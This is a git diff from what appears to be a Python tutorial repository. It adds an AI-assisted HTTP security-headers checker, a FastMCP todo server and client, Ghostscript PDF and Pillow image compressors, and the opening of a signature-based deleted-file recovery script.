+ except Exception as e:
+ return f"Analysis failed: {e}"
+
+ def analyze_url(self, url: str, timeout: int = 10) -> Dict:
+ """Analyze a single URL"""
+ print(f"\nAnalyzing: {url}")
+ print("-" * 50)
+
+ headers, status_code = self.fetch_headers(url, timeout)
+ if not headers:
+ return {"url": url, "error": "Failed to fetch headers"}
+
+ print(f"Status Code: {status_code}")
+ print(f"\nHTTP Headers ({len(headers)} found):")
+ print("-" * 30)
+ for key, value in headers.items():
+ print(f"{key}: {value}")
+
+ print(f"\nAnalyzing with AI...")
+ analysis = self.analyze_headers(url, headers, status_code)
+
+ print("\nSECURITY ANALYSIS")
+ print("=" * 50)
+ print(analysis)
+
+ return {
+ "url": url,
+ "status_code": status_code,
+ "headers_count": len(headers),
+ "analysis": analysis,
+ "raw_headers": headers
+ }
+
+ def analyze_multiple_urls(self, urls: List[str], timeout: int = 10) -> List[Dict]:
+ """Analyze multiple URLs"""
+ results = []
+ for i, url in enumerate(urls, 1):
+ print(f"\n[{i}/{len(urls)}]")
+ result = self.analyze_url(url, timeout)
+ results.append(result)
+ return results
+
+ def export_results(self, results: List[Dict], filename: str):
+ """Export results to JSON"""
+ with open(filename, 'w') as f:
+ json.dump(results, f, indent=2, ensure_ascii=False)
+        print(f"\nResults exported to: {filename}")
+
+def main():
+ parser = argparse.ArgumentParser(
+ description='Analyze HTTP security headers using AI',
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog='''Examples:
+ python security_headers.py https://example.com
+ python security_headers.py example.com google.com
+ python security_headers.py example.com --export results.json
+
+Environment Variables:
+ OPENROUTER_API_KEY - API key for OpenRouter
+ OPENAI_API_KEY - API key for OpenAI
+ LLM_MODEL - Model to use (default: deepseek/deepseek-chat-v3.1:free)'''
+ )
+
+ parser.add_argument('urls', nargs='+', help='URLs to analyze')
+ parser.add_argument('--api-key', help='API key for LLM service')
+ parser.add_argument('--base-url', help='Base URL for LLM API')
+ parser.add_argument('--model', help='LLM model to use')
+ parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10s)')
+ parser.add_argument('--export', help='Export results to JSON file')
+
+ args = parser.parse_args()
+
+ try:
+ analyzer = SecurityHeadersAnalyzer(
+ api_key=args.api_key,
+ base_url=args.base_url,
+ model=args.model
+ )
+
+ results = analyzer.analyze_multiple_urls(args.urls, args.timeout)
+
+ if args.export:
+ analyzer.export_results(results, args.export)
+
+ except ValueError as e:
+ print(f"Error: {e}")
+ return 1
+ except KeyboardInterrupt:
+ print("\nAnalysis interrupted by user")
+ return 1
+
+if __name__ == '__main__':
+    raise SystemExit(main())
\ No newline at end of file
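The analyzer delegates all judgment to the LLM. A deterministic pre-check for commonly recommended response headers (drawing on OWASP's secure-headers guidance) could complement the AI analysis — an illustrative sketch, not part of the PR:

```python
RECOMMENDED_HEADERS = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Referrer-Policy",
)

def missing_security_headers(headers):
    """Return recommended response headers absent from `headers` (case-insensitive)."""
    present = {name.lower() for name in headers}
    return [h for h in RECOMMENDED_HEADERS if h.lower() not in present]
```

Running this before the LLM call gives a stable baseline even when the model's wording varies between runs.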
diff --git a/ethical-hacking/http-security-headers/requirements.txt b/ethical-hacking/http-security-headers/requirements.txt
new file mode 100644
index 00000000..f0dd0aec
--- /dev/null
+++ b/ethical-hacking/http-security-headers/requirements.txt
@@ -0,0 +1,2 @@
+openai
+requests
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/README.md b/general/fastmcp-mcp-client-server-todo-manager/README.md
new file mode 100644
index 00000000..dd988428
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/README.md
@@ -0,0 +1,39 @@
+# Build a real MCP client and server in Python with FastMCP (Todo Manager example)
+
+This folder contains the code that accompanies the article:
+
+- Article: https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager
+
+## What’s included
+- `todo_server.py`: FastMCP MCP server exposing tools, resources, and a prompt for a Todo Manager.
+- `todo_client_test.py`: A small client script that connects to the server and exercises all features.
+- `requirements.txt`: Python dependencies for this tutorial.
+
+## Quick start
+1) Install requirements
+```bash
+python -m venv .venv && source .venv/bin/activate # or use your preferred env manager
+pip install -r requirements.txt
+```
+
+2) Run the server (stdio transport by default)
+```bash
+python todo_server.py
+```
+
+3) In a separate terminal, run the client
+```bash
+python todo_client_test.py
+```
+
+## Optional: run the server over HTTP
+- In `todo_server.py`, replace the last line with:
+```python
+mcp.run(transport="http", host="127.0.0.1", port=8000)
+```
+- Then change the client constructor to `Client("http://127.0.0.1:8000/mcp")`.
+
+## Notes
+- Requires Python 3.10+.
+- The example uses in-memory storage for simplicity.
+- For production tips (HTTPS, auth, containerization), see the article.
diff --git a/general/fastmcp-mcp-client-server-todo-manager/requirements.txt b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
new file mode 100644
index 00000000..2c9387f7
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
@@ -0,0 +1 @@
+fastmcp>=2.12
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
new file mode 100644
index 00000000..f01a1e78
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
@@ -0,0 +1,50 @@
+import asyncio
+from fastmcp import Client
+
+async def main():
+ # Option A: Connect to local Python script (stdio)
+ client = Client("todo_server.py")
+
+ # Option B: In-memory (for tests)
+ # from todo_server import mcp
+ # client = Client(mcp)
+
+ async with client:
+ await client.ping()
+ print("[OK] Connected")
+
+ # Create a few todos
+ t1 = await client.call_tool("create_todo", {"title": "Write README", "priority": "high"})
+ t2 = await client.call_tool("create_todo", {"title": "Refactor utils", "description": "Split helpers into modules"})
+ t3 = await client.call_tool("create_todo", {"title": "Add tests", "priority": "low"})
+ print("Created IDs:", t1.data["id"], t2.data["id"], t3.data["id"])
+
+ # List open
+ open_list = await client.call_tool("list_todos", {"status": "open"})
+ print("Open IDs:", [t["id"] for t in open_list.data["items"]])
+
+ # Complete one
+ updated = await client.call_tool("complete_todo", {"todo_id": t2.data["id"]})
+ print("Completed:", updated.data["id"], "status:", updated.data["status"])
+
+ # Search
+ found = await client.call_tool("search_todos", {"query": "readme"})
+ print("Search 'readme':", [t["id"] for t in found.data["items"]])
+
+ # Resources
+ stats = await client.read_resource("stats://todos")
+ print("Stats:", getattr(stats[0], "text", None) or stats[0])
+
+ todo2 = await client.read_resource(f"todo://{t2.data['id']}")
+ print("todo://{id}:", getattr(todo2[0], "text", None) or todo2[0])
+
+ # Prompt
+ prompt_msgs = await client.get_prompt("suggest_next_action", {"pending": 2, "project": "MCP tutorial"})
+ msgs_pretty = [
+ {"role": m.role, "content": getattr(m, "content", None) or getattr(m, "text", None)}
+ for m in getattr(prompt_msgs, "messages", [])
+ ]
+ print("Prompt messages:", msgs_pretty)
+
+if __name__ == "__main__":
+ asyncio.run(main())
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_server.py b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
new file mode 100644
index 00000000..64f99b73
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
@@ -0,0 +1,88 @@
+from typing import Literal
+from itertools import count
+from datetime import datetime, timezone
+from fastmcp import FastMCP
+
+# In-memory storage for demo purposes
+TODOS: list[dict] = []
+_id = count(start=1)
+
+mcp = FastMCP(name="Todo Manager")
+
+@mcp.tool
+def create_todo(
+ title: str,
+ description: str = "",
+ priority: Literal["low", "medium", "high"] = "medium",
+) -> dict:
+ """Create a todo (id, title, status, priority, timestamps)."""
+ todo = {
+ "id": next(_id),
+ "title": title,
+ "description": description,
+ "priority": priority,
+ "status": "open",
+ "created_at": datetime.now(timezone.utc).isoformat(),
+ "completed_at": None,
+ }
+ TODOS.append(todo)
+ return todo
+
+@mcp.tool
+def list_todos(status: Literal["open", "done", "all"] = "open") -> dict:
+ """List todos by status ('open' | 'done' | 'all')."""
+ if status == "all":
+ items = TODOS
+ elif status == "open":
+ items = [t for t in TODOS if t["status"] == "open"]
+ else:
+ items = [t for t in TODOS if t["status"] == "done"]
+ return {"items": items}
+
+@mcp.tool
+def complete_todo(todo_id: int) -> dict:
+ """Mark a todo as done."""
+ for t in TODOS:
+ if t["id"] == todo_id:
+ t["status"] = "done"
+ t["completed_at"] = datetime.now(timezone.utc).isoformat()
+ return t
+ raise ValueError(f"Todo {todo_id} not found")
+
+@mcp.tool
+def search_todos(query: str) -> dict:
+ """Case-insensitive search in title/description."""
+ q = query.lower().strip()
+ items = [t for t in TODOS if q in t["title"].lower() or q in t["description"].lower()]
+ return {"items": items}
+
+# Read-only resources
+@mcp.resource("stats://todos")
+def todo_stats() -> dict:
+ """Aggregated stats: total, open, done."""
+ total = len(TODOS)
+ open_count = sum(1 for t in TODOS if t["status"] == "open")
+ done_count = total - open_count
+ return {"total": total, "open": open_count, "done": done_count}
+
+@mcp.resource("todo://{id}")
+def get_todo(id: int) -> dict:
+ """Fetch a single todo by id."""
+ for t in TODOS:
+ if t["id"] == id:
+ return t
+ raise ValueError(f"Todo {id} not found")
+
+# A reusable prompt
+@mcp.prompt
+def suggest_next_action(pending: int, project: str | None = None) -> str:
+ """Render a small instruction for an LLM to propose next action."""
+ base = f"You have {pending} pending TODOs. "
+ if project:
+ base += f"They relate to the project '{project}'. "
+ base += "Suggest the most impactful next action in one short sentence."
+ return base
+
+if __name__ == "__main__":
+ # Default transport is stdio; you can also use transport="http", host=..., port=...
+ mcp.run()
diff --git a/general/interactive-weather-plot/interactive_weather_plot.py b/general/interactive-weather-plot/interactive_weather_plot.py
index b4d17141..3d1ea566 100644
--- a/general/interactive-weather-plot/interactive_weather_plot.py
+++ b/general/interactive-weather-plot/interactive_weather_plot.py
@@ -68,7 +68,7 @@ def changeLocation(newLocation):
# Making the Radio Buttons
buttons = RadioButtons(
ax=plt.axes([0.1, 0.1, 0.2, 0.2]),
- labels=locations.keys()
+ labels=list(locations.keys())
)
# Connect click event on the buttons to the function that changes location.
@@ -86,4 +86,4 @@ def changeLocation(newLocation):
plt.savefig('file.svg', format='svg')
-plt.show()
\ No newline at end of file
+plt.show()
diff --git a/gui-programming/rich-text-editor/rich_text_editor.py b/gui-programming/rich-text-editor/rich_text_editor.py
index 10c14263..05259905 100644
--- a/gui-programming/rich-text-editor/rich_text_editor.py
+++ b/gui-programming/rich-text-editor/rich_text_editor.py
@@ -112,9 +112,9 @@ def fileManager(event=None, action=None):
document['tags'][tagName] = []
ranges = textArea.tag_ranges(tagName)
-
- for i, tagRange in enumerate(ranges[::2]):
- document['tags'][tagName].append([str(tagRange), str(ranges[i+1])])
+
+ for i in range(0, len(ranges), 2):
+ document['tags'][tagName].append([str(ranges[i]), str(ranges[i + 1])])
if not filePath:
# ask the user for a filename with the native file explorer.
diff --git a/handling-pdf-files/pdf-compressor/README.md b/handling-pdf-files/pdf-compressor/README.md
index 4527174c..307f105c 100644
--- a/handling-pdf-files/pdf-compressor/README.md
+++ b/handling-pdf-files/pdf-compressor/README.md
@@ -1,8 +1,48 @@
# [How to Compress PDF Files in Python](https://www.thepythoncode.com/article/compress-pdf-files-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To compress `bert-paper.pdf` file:
- ```
- $ python pdf_compressor.py bert-paper.pdf bert-paper-min.pdf
- ```
- This will spawn a new compressed PDF file under the name `bert-paper-min.pdf`.
+
+This directory contains two approaches:
+
+- Legacy (commercial): `pdf_compressor.py` uses PDFTron/PDFNet. PDFNet now requires a license key and the old pip package is not freely available, so this may not work without a license.
+- Recommended (open source): `pdf_compressor_ghostscript.py` uses Ghostscript to compress PDFs.
+
+## Ghostscript method (recommended)
+
+Prerequisite: Install Ghostscript
+
+- macOS (Homebrew):
+ - `brew install ghostscript`
+- Ubuntu/Debian:
+ - `sudo apt-get update && sudo apt-get install -y ghostscript`
+- Windows:
+ - Download and install from https://ghostscript.com/releases/
+ - Ensure `gswin64c.exe` (or `gswin32c.exe`) is in your PATH.
+
+No Python packages are required for this method, only Ghostscript.
+
+### Usage
+
+To compress `bert-paper.pdf` into `bert-paper-min.pdf` with default quality (`power=2`):
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf
+```
+
+Optional quality level `[power]` controls compression/quality tradeoff (maps to Ghostscript `-dPDFSETTINGS`):
+
+- 0 = `/screen` (smallest, lowest quality)
+- 1 = `/ebook` (good quality)
+- 2 = `/printer` (high quality) [default]
+- 3 = `/prepress` (very high quality)
+- 4 = `/default` (Ghostscript default)
+
+Example:
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf 1
+```
+
+In testing, `bert-paper.pdf` (~757 KB) compressed to ~407 KB with `power=1`.
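Under the hood, the numeric level is only a convenience wrapper around Ghostscript's presets; a minimal sketch of the mapping the script applies (mirroring its `settings_map`, with `pdf_setting` as an illustrative helper name):

```python
# Each power level maps to a Ghostscript -dPDFSETTINGS preset;
# out-of-range values fall back to /printer, the script's default.
SETTINGS_MAP = {0: "/screen", 1: "/ebook", 2: "/printer", 3: "/prepress", 4: "/default"}

def pdf_setting(power: int) -> str:
    return SETTINGS_MAP.get(power, "/printer")

print(pdf_setting(1))   # /ebook
print(pdf_setting(99))  # /printer (fallback)
```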
+
+## Legacy PDFNet method (requires license)
+
+If you have a valid license and the PDFNet SDK installed, you can use the original `pdf_compressor.py` script. Note that the previously referenced `PDFNetPython3` pip package is not freely available and may not install via pip. Refer to the vendor's documentation for installation and licensing.
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
new file mode 100644
index 00000000..88de4062
--- /dev/null
+++ b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
@@ -0,0 +1,103 @@
+import os
+import sys
+import subprocess
+import shutil
+
+
+def get_size_format(b, factor=1024, suffix="B"):
+ for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
+ if b < factor:
+ return f"{b:.2f}{unit}{suffix}"
+ b /= factor
+ return f"{b:.2f}Y{suffix}"
+
+
+def find_ghostscript_executable():
+ candidates = [
+ shutil.which('gs'),
+ shutil.which('gswin64c'),
+ shutil.which('gswin32c'),
+ ]
+ for c in candidates:
+ if c:
+ return c
+ return None
+
+
+def compress_file(input_file: str, output_file: str, power: int = 2):
+ """Compress PDF using Ghostscript.
+
+ power:
+ 0 -> /screen (lowest quality, highest compression)
+ 1 -> /ebook (good quality)
+ 2 -> /printer (high quality) [default]
+ 3 -> /prepress (very high quality)
+ 4 -> /default (Ghostscript default)
+ """
+ if not os.path.exists(input_file):
+ raise FileNotFoundError(f"Input file not found: {input_file}")
+ if not output_file:
+ output_file = input_file
+
+ initial_size = os.path.getsize(input_file)
+
+ gs = find_ghostscript_executable()
+ if not gs:
+ raise RuntimeError(
+ "Ghostscript not found. Install it and ensure 'gs' (Linux/macOS) "
+ "or 'gswin64c'/'gswin32c' (Windows) is in PATH."
+ )
+
+ settings_map = {
+ 0: '/screen',
+ 1: '/ebook',
+ 2: '/printer',
+ 3: '/prepress',
+ 4: '/default',
+ }
+ pdfsettings = settings_map.get(power, '/printer')
+
+ cmd = [
+ gs,
+ '-sDEVICE=pdfwrite',
+ '-dCompatibilityLevel=1.4',
+ f'-dPDFSETTINGS={pdfsettings}',
+ '-dNOPAUSE',
+ '-dBATCH',
+ '-dQUIET',
+ f'-sOutputFile={output_file}',
+ input_file,
+ ]
+
+ try:
+ subprocess.run(cmd, check=True)
+ except subprocess.CalledProcessError as e:
+ print(f"Ghostscript failed: {e}")
+ return False
+
+ compressed_size = os.path.getsize(output_file)
+ ratio = 1 - (compressed_size / initial_size)
+ summary = {
+ "Input File": input_file,
+ "Initial Size": get_size_format(initial_size),
+ "Output File": output_file,
+ "Compressed Size": get_size_format(compressed_size),
+ "Compression Ratio": f"{ratio:.3%}",
+ }
+
+ print("## Summary ########################################################")
+ for k, v in summary.items():
+ print(f"{k}: {v}")
+ print("###################################################################")
+ return True
+
+
+if __name__ == '__main__':
+ if len(sys.argv) < 3:
+ print("Usage: python pdf_compressor_ghostscript.py <input.pdf> <output.pdf> [power 0-4]")
+ sys.exit(1)
+ input_file = sys.argv[1]
+ output_file = sys.argv[2]
+ power = int(sys.argv[3]) if len(sys.argv) > 3 else 2
+ ok = compress_file(input_file, output_file, power)
+ sys.exit(0 if ok else 2)
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/requirements.txt b/handling-pdf-files/pdf-compressor/requirements.txt
index 0a664a86..9f6e5337 100644
--- a/handling-pdf-files/pdf-compressor/requirements.txt
+++ b/handling-pdf-files/pdf-compressor/requirements.txt
@@ -1 +1,7 @@
-PDFNetPython3==8.1.0
\ No newline at end of file
+# No Python dependencies required for Ghostscript-based compressor.
+# System dependency: Ghostscript
+# - macOS: brew install ghostscript
+# - Debian: sudo apt-get install -y ghostscript
+# - Windows: https://ghostscript.com/releases/
+#
+# The legacy script (pdf_compressor.py) depends on PDFNet (commercial) and a license key.
\ No newline at end of file
diff --git a/images/codingfleet-banner-2.png b/images/codingfleet-banner-2.png
new file mode 100644
index 00000000..e95c4d27
Binary files /dev/null and b/images/codingfleet-banner-2.png differ
diff --git a/images/codingfleet-banner-3.png b/images/codingfleet-banner-3.png
new file mode 100644
index 00000000..9f27495e
Binary files /dev/null and b/images/codingfleet-banner-3.png differ
diff --git a/python-for-multimedia/compress-image/README.md b/python-for-multimedia/compress-image/README.md
index 32f51450..919414cc 100644
--- a/python-for-multimedia/compress-image/README.md
+++ b/python-for-multimedia/compress-image/README.md
@@ -1,4 +1,56 @@
-# [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- `python compress_image.py --help`
\ No newline at end of file
+# [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python)
+
+Advanced Image Compressor with Batch Processing
+
+This script provides advanced image compression and resizing features using Python and Pillow.
+
+## Features
+
+- Batch processing of multiple images or directories
+- Lossy and lossless compression (PNG/WebP)
+- Optional JPEG conversion
+- Resize by ratio or explicit dimensions
+- Preserve or strip metadata (EXIF)
+- Custom output directory
+- Progress bar using `tqdm`
+- Detailed logging
+
+## Requirements
+
+- Python 3.6+
+- [Pillow](https://pypi.org/project/Pillow/)
+- [tqdm](https://pypi.org/project/tqdm/)
+
+Install dependencies:
+
+```bash
+pip install pillow tqdm
+```
+
+## Usage
+
+```bash
+python compress_image.py [options] <input> [<input> ...]
+```
+
+## Options
+- `-o`, `--output-dir`: Output directory (default: same as input)
+- `-q`, `--quality`: Compression quality (0-100, default: 85)
+- `-r`, `--resize-ratio`: Resize ratio (0-1, default: 1.0)
+- `-w`, `--width`: Output width (requires `--height`)
+- `-hh`, `--height`: Output height (requires `--width`)
+- `-j`, `--to-jpg`: Convert output to JPEG
+- `-m`, `--no-metadata`: Strip metadata (default: preserve)
+- `-l`, `--lossless`: Use lossless compression (PNG/WEBP)
+
+## Examples
+
+```bash
+python compress_image.py image.jpg -r 0.5 -q 80 -j
+python compress_image.py images/ -o output/ -m
+python compress_image.py image.png -l
+```
+
+## License
+
+MIT License.
diff --git a/python-for-multimedia/compress-image/compress_image.py b/python-for-multimedia/compress-image/compress_image.py
index 6560b887..f1696aa0 100644
--- a/python-for-multimedia/compress-image/compress_image.py
+++ b/python-for-multimedia/compress-image/compress_image.py
@@ -1,88 +1,104 @@
import os
from PIL import Image
+import argparse
+import logging
+from tqdm import tqdm
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+logger = logging.getLogger(__name__)
def get_size_format(b, factor=1024, suffix="B"):
- """
- Scale bytes to its proper byte format
- e.g:
- 1253656 => '1.20MB'
- 1253656678 => '1.17GB'
- """
+ """Scale bytes to its proper byte format."""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
-
-
-def compress_img(image_name, new_size_ratio=0.9, quality=90, width=None, height=None, to_jpg=True):
- # load the image to memory
- img = Image.open(image_name)
- # print the original image shape
- print("[*] Image shape:", img.size)
- # get the original image size in bytes
- image_size = os.path.getsize(image_name)
- # print the size before compression/resizing
- print("[*] Size before compression:", get_size_format(image_size))
- if new_size_ratio < 1.0:
- # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size
- img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.LANCZOS)
- # print new image shape
- print("[+] New Image shape:", img.size)
- elif width and height:
- # if width and height are set, resize with them instead
- img = img.resize((width, height), Image.LANCZOS)
- # print new image shape
- print("[+] New Image shape:", img.size)
- # split the filename and extension
- filename, ext = os.path.splitext(image_name)
- # make new filename appending _compressed to the original file name
- if to_jpg:
- # change the extension to JPEG
- new_filename = f"{filename}_compressed.jpg"
- else:
- # retain the same extension of the original image
- new_filename = f"{filename}_compressed{ext}"
+def compress_image(
+ input_path,
+ output_dir=None,
+ quality=85,
+ resize_ratio=1.0,
+ width=None,
+ height=None,
+ to_jpg=False,
+ preserve_metadata=True,
+ lossless=False,
+):
+ """Compress an image with advanced options."""
try:
- # save the image with the corresponding quality and optimize set to True
- img.save(new_filename, quality=quality, optimize=True)
- except OSError:
- # convert the image to RGB mode first
- img = img.convert("RGB")
- # save the image with the corresponding quality and optimize set to True
- img.save(new_filename, quality=quality, optimize=True)
- print("[+] New file saved:", new_filename)
- # get the new image size in bytes
- new_image_size = os.path.getsize(new_filename)
- # print the new size in a good format
- print("[+] Size after compression:", get_size_format(new_image_size))
- # calculate the saving bytes
- saving_diff = new_image_size - image_size
- # print the saving percentage
- print(f"[+] Image size change: {saving_diff/image_size*100:.2f}% of the original image size.")
-
-
+ img = Image.open(input_path)
+ logger.info(f"[*] Processing: {os.path.basename(input_path)}")
+ logger.info(f"[*] Original size: {get_size_format(os.path.getsize(input_path))}")
+
+ # Resize if needed
+ if resize_ratio < 1.0:
+ new_size = (int(img.size[0] * resize_ratio), int(img.size[1] * resize_ratio))
+ img = img.resize(new_size, Image.LANCZOS)
+ logger.info(f"[+] Resized to: {new_size}")
+ elif width and height:
+ img = img.resize((width, height), Image.LANCZOS)
+ logger.info(f"[+] Resized to: {width}x{height}")
+
+ # Prepare output path
+ filename, ext = os.path.splitext(os.path.basename(input_path))
+ output_ext = ".jpg" if to_jpg else ext
+ output_filename = f"{filename}_compressed{output_ext}"
+ output_path = os.path.join(output_dir or os.path.dirname(input_path), output_filename)
+
+ # Save with options
+ save_kwargs = {"quality": quality, "optimize": True}
+ if not preserve_metadata:
+ save_kwargs["exif"] = b"" # Strip metadata
+ if lossless and ext.lower() in (".png", ".webp"):
+ save_kwargs["lossless"] = True
+
+ try:
+ img.save(output_path, **save_kwargs)
+ except OSError:
+ img = img.convert("RGB")
+ img.save(output_path, **save_kwargs)
+
+ logger.info(f"[+] Saved to: {output_path}")
+ logger.info(f"[+] New size: {get_size_format(os.path.getsize(output_path))}")
+ except Exception as e:
+ logger.error(f"[!] Error processing {input_path}: {e}")
+
+def batch_compress(
+ input_paths,
+ output_dir=None,
+ quality=85,
+ resize_ratio=1.0,
+ width=None,
+ height=None,
+ to_jpg=False,
+ preserve_metadata=True,
+ lossless=False,
+):
+ """Compress multiple images."""
+ if output_dir and not os.path.exists(output_dir):
+ os.makedirs(output_dir, exist_ok=True)
+ for path in tqdm(input_paths, desc="Compressing images"):
+ compress_image(path, output_dir, quality, resize_ratio, width, height, to_jpg, preserve_metadata, lossless)
+
if __name__ == "__main__":
- import argparse
- parser = argparse.ArgumentParser(description="Simple Python script for compressing and resizing images")
- parser.add_argument("image", help="Target image to compress and/or resize")
- parser.add_argument("-j", "--to-jpg", action="store_true", help="Whether to convert the image to the JPEG format")
- parser.add_argument("-q", "--quality", type=int, help="Quality ranging from a minimum of 0 (worst) to a maximum of 95 (best). Default is 90", default=90)
- parser.add_argument("-r", "--resize-ratio", type=float, help="Resizing ratio from 0 to 1, setting to 0.5 will multiply width & height of the image by 0.5. Default is 1.0", default=1.0)
- parser.add_argument("-w", "--width", type=int, help="The new width image, make sure to set it with the `height` parameter")
- parser.add_argument("-hh", "--height", type=int, help="The new height for the image, make sure to set it with the `width` parameter")
+ parser = argparse.ArgumentParser(description="Advanced Image Compressor with Batch Processing")
+ parser.add_argument("input", nargs='+', help="Input image(s) or directory")
+ parser.add_argument("-o", "--output-dir", help="Output directory (default: same as input)")
+ parser.add_argument("-q", "--quality", type=int, default=85, help="Compression quality (0-100)")
+ parser.add_argument("-r", "--resize-ratio", type=float, default=1.0, help="Resize ratio (0-1)")
+ parser.add_argument("-w", "--width", type=int, help="Output width (requires --height)")
+ parser.add_argument("-hh", "--height", type=int, help="Output height (requires --width)")
+ parser.add_argument("-j", "--to-jpg", action="store_true", help="Convert output to JPEG")
+ parser.add_argument("-m", "--no-metadata", action="store_false", help="Strip metadata")
+ parser.add_argument("-l", "--lossless", action="store_true", help="Use lossless compression (PNG/WEBP)")
+
args = parser.parse_args()
- # print the passed arguments
- print("="*50)
- print("[*] Image:", args.image)
- print("[*] To JPEG:", args.to_jpg)
- print("[*] Quality:", args.quality)
- print("[*] Resizing ratio:", args.resize_ratio)
- if args.width and args.height:
- print("[*] Width:", args.width)
- print("[*] Height:", args.height)
- print("="*50)
- # compress the image
- compress_img(args.image, args.resize_ratio, args.quality, args.width, args.height, args.to_jpg)
\ No newline at end of file
+    input_paths = []
+    for path in args.input:
+        if os.path.isdir(path):
+            input_paths.extend(
+                os.path.join(path, f)
+                for f in os.listdir(path)
+                if f.lower().endswith((".jpg", ".jpeg", ".png", ".webp"))
+            )
+        else:
+            input_paths.append(path)
+    if not input_paths:
+        logger.error("No valid images found!")
+        raise SystemExit(1)
+    batch_compress(input_paths, args.output_dir, args.quality, args.resize_ratio, args.width, args.height, args.to_jpg, args.no_metadata, args.lossless)
diff --git a/python-for-multimedia/recover-deleted-files/README.md b/python-for-multimedia/recover-deleted-files/README.md
new file mode 100644
index 00000000..9b57b100
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/README.md
@@ -0,0 +1 @@
+# [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python)
\ No newline at end of file
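
The recovery script works by signature carving: it reads raw device blocks and searches them for known magic numbers. A minimal sketch of the core idea (`find_signature` is an illustrative helper; the magic bytes match one of the script's JPEG signatures):

```python
# One of the JPEG signatures the recovery script scans for (JFIF header)
JPG_MAGIC = bytes([0xFF, 0xD8, 0xFF, 0xE0])

def find_signature(data: bytes, signature: bytes) -> int:
    """Return the offset of the first occurrence of signature, or -1 if absent."""
    return data.find(signature)

blob = b"\x00" * 10 + JPG_MAGIC + b"...rest of a carved file..."
print(find_signature(blob, JPG_MAGIC))  # 10
```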
diff --git a/python-for-multimedia/recover-deleted-files/file_recovery.py b/python-for-multimedia/recover-deleted-files/file_recovery.py
new file mode 100644
index 00000000..057995c4
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/file_recovery.py
@@ -0,0 +1,552 @@
+
+import os
+import sys
+import argparse
+import struct
+import time
+import logging
+import subprocess
+import signal
+from datetime import datetime, timedelta
+from pathlib import Path
+import binascii
+
+# File signatures (magic numbers) for common file types
+FILE_SIGNATURES = {
+ 'jpg': [bytes([0xFF, 0xD8, 0xFF, 0xE0]), bytes([0xFF, 0xD8, 0xFF, 0xE1])],
+ 'png': [bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])],
+ 'gif': [bytes([0x47, 0x49, 0x46, 0x38, 0x37, 0x61]), bytes([0x47, 0x49, 0x46, 0x38, 0x39, 0x61])],
+ 'pdf': [bytes([0x25, 0x50, 0x44, 0x46])],
+ 'zip': [bytes([0x50, 0x4B, 0x03, 0x04])],
+ 'docx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'xlsx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'pptx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'mp3': [bytes([0x49, 0x44, 0x33])],
+ 'mp4': [bytes([0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70])],
+ 'avi': [bytes([0x52, 0x49, 0x46, 0x46])],
+}
+
+# Additional validation patterns to check after finding the signature
+# This helps reduce false positives
+VALIDATION_PATTERNS = {
+ 'docx': [b'word/', b'[Content_Types].xml'],
+ 'xlsx': [b'xl/', b'[Content_Types].xml'],
+ 'pptx': [b'ppt/', b'[Content_Types].xml'],
+ 'zip': [b'PK\x01\x02'], # Central directory header
+ 'pdf': [b'obj', b'endobj'],
+}
+
+# File endings (trailer signatures) for some file types
+FILE_TRAILERS = {
+ 'jpg': bytes([0xFF, 0xD9]),
+ 'png': bytes([0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82]),
+ 'gif': bytes([0x00, 0x3B]),
+ 'pdf': bytes([0x25, 0x25, 0x45, 0x4F, 0x46]),
+}
+
+# Maximum file sizes to prevent recovering corrupted files
+MAX_FILE_SIZES = {
+ 'jpg': 30 * 1024 * 1024, # 30MB
+ 'png': 50 * 1024 * 1024, # 50MB
+ 'gif': 20 * 1024 * 1024, # 20MB
+ 'pdf': 100 * 1024 * 1024, # 100MB
+ 'zip': 200 * 1024 * 1024, # 200MB
+ 'docx': 50 * 1024 * 1024, # 50MB
